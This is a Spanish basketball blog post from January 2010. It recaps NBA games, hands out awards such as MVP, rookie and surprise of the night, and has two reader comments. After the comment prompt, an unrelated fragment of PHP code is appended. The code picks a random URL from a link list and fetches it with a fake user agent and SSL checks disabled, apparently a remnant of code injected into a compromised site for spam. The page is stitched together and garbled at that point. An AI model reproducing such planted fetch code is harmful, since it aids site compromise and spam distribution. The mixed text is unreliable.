La Crónica (25/01/10)

26 de January de 2010 por txusma

Por fin. Los Grizzlies, en la cresta de la ola, se meten en plaza de playoff por derecho propio y de la mejor manera posible: Doblegando a Orlando. Sometiendo a un gran Dwight Howard a través de la extraordinaria pareja interior “Big” Marc & Zach Randolph, compensando con la inteligencia de OJ Mayo y un Conley muy centrado y con Rudy Gay suficientemente sosegado… Quién les ha visto y quién les ve.

La guillotina está preparada en el Oeste para ir cortando cabezas. Los Rockets no logran aguantar el exigente ritmo. No pudieron con la defensa de los Hawks y se caen eventualmente de los 8 primeros puestos. Tampoco les ha servido a los Hornets la meritoria victoria “in extremis” en el Rose Garden. “Manda h..s” que diría aquel, que McMillan tenga un jugador de la talla y experiencia de Rudy Fernández (y su demostrada habilidad para resolver según qué situaciones) y le dé el balón decisivo al otrora marginado Bayless en una resolución tácticamente lamentable. En el libro de jugadas de McMallon, más allá de la sesuda jugada de dársela a Roy, no hay nada. Y los Blazers ya están al borde del abismo.

Y no son los únicos que sienten el aliento en el cogote. Los Suns anotaron 70 puntos en la primera parte y perdieron el partido en Salt Lake City. Kirilenko y, sobre todo, Wesley Matthews fueron los héroes de la remontada. Triste celebración a las 8.000 asistencias de Nash. Y cuidado que vienen curvas. Y los Spurs han perdido nada menos que 5 de sus 6 últimos partidos. A Popovic no le debe de llegar la camisa al cuello. Ayer tocaba contra unos Bulls que se han puesto serios, sobre todo defensivamente. Ellos han ganado 7 de sus 10 últimos. Estaríamos hablando de otra cosa si ese fuese su balance regular.

No fallaron, ni los Nuggets sin Melo frente a los difíciles Bobcats (que están pasando otra pájara), ni los Celtics contra los Clippers… ni, sobre todo Cavs frente a Heat o LeBron contra Wade. Flash desperdició inexplicablemente varias opciones para ganar el choque.

Por último, Indiana le ganó a Philadelphia, en la parte baja de la tabla.

PREMIOS

MVP: Con su equipo en Playoffs y él cuajando grandes actuaciones como la de ayer (23 puntos, 19 rebotes), Zach Randolph está cada vez más cerquita del All-Stars. Otro que tiene muchas posibilidades de estrenarse en el evento es Josh Smith. Anoche cuajó un gran partido con 22 puntos, 10 rebotes, 4 robos y 4 tapones. Quien sí estará seguro es Chris Paul, y más si continúa ofreciéndonos partidos como el de ayer: 24 puntos, 7 rebotes, 12 asistencias y canasta ganadora en los últimos segundos. En cambio, Carlos Boozer no aparece en muchas quinielas pero también está a un nivel altísimo. 21 puntos y 20 rebotes, ayer frente los Suns. Finalmente, Chauncey Billups se fue a los 27 puntos, 11 asistencias y 6 rebotes. ¡Vaya jugadores tiene el Oeste!.

Rookie: Marcus Thorton disputó anoche su primer partido como titular en los Hornets y no lo hizo nada mal. 19 puntos con 8 de 12 en tiro. Esperemos a ver si se afianza en esa posición.

Sorpresa: Sorpresa, no. Sorpresón el ver a Goran Dragic anotar 32 puntos con un excelente 10 de 13 en tiro. Veremos si no ha sido como el burro de la fábula. Arron Afflalo no es la primera vez que aparece por aquí y su condición de titular indiscutible hará en breve que le dejemos de considerar como sorpresa pero aún no nos acostumbramos del todo a que anote 24 puntos y dé 7 asistencias.

Decepción: 2 puntos, 1 de 8 en tiro, 2 rebotes, producción impropia de Richard Jefferson. Muy mal lo están pasando los Spurs.

Mayor esfuerzo en vano: Dwight Howard fue de lo poco que funcionó en la derrota de los Magic frente los Grizzlies. El máximo reboteador de la liga se fue a los 27 puntos, 15 rebotes y 6 tapones pero estuvo demasiado solo.

Comenta

2 comentarios a esta entrada

  1. PIRATA dice:
    #1

    He podido ver el partido de Memphis y me ha gustado mucho, este equipo da muy buenas sensaciones, no se ponen nerviosos cuando se escapa el rival (hasta de 16 se fueron los magic en la primera parte) pero ellos a lo suyo y poco a poco, o mejor dicho rebote a rebote (45 a 37 para los ositos) se han hecho suyo el partido. Por cierto no nombrais el canastón de Zach desde la propia zona al final del 2ndo cuarto, increíble.
    Sinceramente me gusta mucho ver a los Grizzlies.

      Citar

  2. CAMPO2 dice:
    #2

    y como sorpresa J. Oneill? he visto jugadas y parecia tener una movilidad que ya no le recordaba

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>